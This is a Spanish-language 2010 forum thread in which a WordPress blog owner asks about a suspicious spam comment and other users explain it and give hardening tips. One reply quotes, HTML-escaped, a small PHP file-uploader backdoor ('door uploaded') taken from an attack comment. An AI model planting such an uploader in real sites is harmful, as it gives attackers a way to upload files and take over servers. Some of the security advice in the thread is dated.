Comentario raro - ¿Exploit?

American2010 · #1 (**permalink**) 21/07/2010, 14:44

Recibí este "comentario" en un blog que tengo, me dijeron que se trata de un exploit o algo así, y algo había oído del tema, pero nunca me había llegado uno.

Lo que quiera saber es si tengo forma de saber si este logró algo o no.

#2 (**permalink**) 22/07/2010, 09:01

Seguramente intentó aprovecharse de algún fallo de validación de código, solamente es javascript para colocar un 'banner' externo en tu página. Si ves el código quiere decir que las etiquetas no fueron analizadas y que wordpress no permitió que se ejecutara. Todo tranquilo (en principio al menos)

American2010 · #3 (**permalink**) 22/07/2010, 13:00

Cita:

Iniciado por AlvaroG

Seguramente intentó aprovecharse de algún fallo de validación de código, solamente es javascript para colocar un 'banner' externo en tu página. Si ves el código quiere decir que las etiquetas no fueron analizadas y que wordpress no permitió que se ejecutara. Todo tranquilo (en principio al menos)

Okos, gracias. Ya puse también un antibots que tengo en otro sitio a ver si dejo de recibir comentarios spam.

Gracias.

metacortex · #4 (**permalink**) 23/07/2010, 06:41

Efectivamente se trata de un intento por ejecutar un sql injetion mediante el formulario de comentarios. Aparentemente se trata de una acción estúpida porque ciertos caracteres son convertidos a entidades html antes de ingresar a la BD. Wordpress lo tiene configurado de esa manera de forma nativa. Aquí una muestra de exploit previamente pasado por el filtro mencionado (lo tomé de un comentario enviado a mi blog):

Código PHP:

Ver original&lt;?php if (isset($_REQUEST[&quot;upload&quot;])) { $file=$HTTP_POST_FILES[&quot;file&quot;][&quot;name&quot;]; $path=realpath('.'); @move_uploaded_file($HTTP_POST_FILES[&quot;file&quot;][&quot;tmp_name&quot;], $path . &quot;/&quot; . $file) or die(); echo &quot;door uploaded&quot;; } else { echo &quot;<b>file uploader</b>"; } ?&gt;

Como pueden notar se trata de un código completa y oportunamente inutilizado debido a la conversión de caracteres.

Sin embargo, actualmente están surgiendo un montón de plugins que gestionan comentarios. Puede que algunos de ellos carezcan de las medidas de seguridad apropiadas. En mi opinión estos agresores no van tras Wordpress en sí, sino tras algún plugin.

Mi sugerencia es que traten en lo posible de verificar la seguridad del código de los plugins que utilizan, especialmente si tienen plugins que intervienen en funciones importantes del sistema, o si emplean formularios.

Algunos tips para verificar:

1.- El ingreso de datos debe efectuarse con la función mysql_real_escape_string.

2.- Los campos de formulario deben estar resguardado con nonce fields y además debe existir la condicional de chequeo de éstos antes de enviar los datos.

3.- La función debe poseer un método de chequeo y validación de referers para asegurarse de que el formulario no se ejecutará desde un servidor externo o zona ajena a la página donde se encuentra el formulario.

Si el plugin no sigue estos procedimientos básicos de seguridad, sencillamente estarán arriesgando su sitio a ataques.

Ahora tres acciones recomendadas a nivel nativo de Wordpress:

1.- Usar Askimet.

2.- Si el sitio web no tiene un alto flujo diario de comentarios recomiendo pre-moderarlos, es decir, que en lugar de pulbicarse inmediatamente vayan a la cola de moderación.

3.- El archivo wp-config.php (ubicado en la raiz de su directorio) tiene estas 4 líneas:

Código PHP:

Ver originaldefine('AUTH_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
define('SECURE_AUTH_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
define('LOGGED_IN_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.
define('NONCE_KEY', 'pon aquí tu frase aleatoria'); // Cambia esto por tu frase aleatoria.

Tal como se repite 8 veces ahí, supongo que queda entendido que hay que cambiar esas frases por una frase aleatoria. El motivo: el sistema codifica y compara las frases ingresadas allí para diversos fines, todos altamente críticos. Para saber cómo proceder hagan esto.

¿Han leido tópicos -en éste y otros foros- donde el usuario lloriquea porque le hackearon el sitio? pues 99 de cada 100 casos se deben a que de una u otra forma debilitaron la seguridad del sistema.

Entonces mis hijos, cada quien a cuidar su negocio porque sino viene el coco y se lo lleva.

Malenko · #5 (**permalink**) 23/07/2010, 07:06

A nivel de wordpress ya aplico tus dos primeros consejos pero la frase aleatoria no la conocía. También muy buenos los consejos a la hora de programar plugins para no perder seguridad.

Un comentario que espero reciba todo el karma que se merece :)

isaac_ben · #6 (**permalink**) 23/07/2010, 09:34

Qué buenos consejos, metacortex.

Creo que lo mejor es utilizar los menos plug-ins posibles, por estas razones.

Saludos.

American2010 · #7 (**permalink**) 23/07/2010, 16:08

Metacortex, ¡¡¡Genial Explicación!!! La verdad que queda muy claro todo. Entre Alvaro y tú, no sólo me han aclarado el tema, sino que me han aclarado también que camino seguir para aumentar la seguridad.

Lo del wp-config.php de poner esas frases aleatorias, si bien lo hago, a veces alguno en alguna instalación rápida de un WP quizás olvida ese paso, y si realmente es tan importante, creo que WP debería considerar mejorar su interfaz de instalación y brindarnos la posibilidad de que eso se realice de forma automática durante la instalación, cómo dice WP "Eso es todo, esperabas más, sentimos descepcionarte" (O algo similar) siempre dicen que instalas el WP en 2 segundos, pero nunca dicen que tenes que hacer varias cosas a mano, como la correcta configuración del wp-config.php y la creación de la carpeta uploads, son sólo algunas de las cosas que recuerdo ahora.

Lo del Akismet,

volveré a instalarlo, debo reconocer que era el primer plugin que borraba de mi WP junto con el "Hello Dolly"

Bueno, miren en lo que se ha convertido el tema

(no hay smile lindo)

Nuevamente, agradecerles las explicaciones